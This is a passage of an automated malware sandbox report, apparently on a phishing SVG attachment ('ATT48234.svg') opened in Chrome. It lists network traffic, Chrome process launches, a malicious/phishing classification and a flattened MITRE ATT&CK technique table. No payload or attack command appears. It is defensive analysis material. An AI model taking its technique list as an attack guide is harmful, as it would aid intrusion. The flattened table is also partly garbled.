        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59663 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
        Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49675
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59664 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59667 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59665 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59664
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59660 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59663
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59666
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59665
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59660
        Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49729 version: TLS 1.2
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir8572_902717126Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir8572_902717126Jump to behavior
        Source: classification engineClassification label: mal64.phis.troj.winSVG@41/34@117/17
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Packages\cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104Jump to behavior
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT48234.svg"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5196 /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5128 /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5196 /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5128 /prefetch:8Jump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
        Process Injection        		11
        Masquerading        		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection        		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        File Deletion        		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer        		Traffic DuplicationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.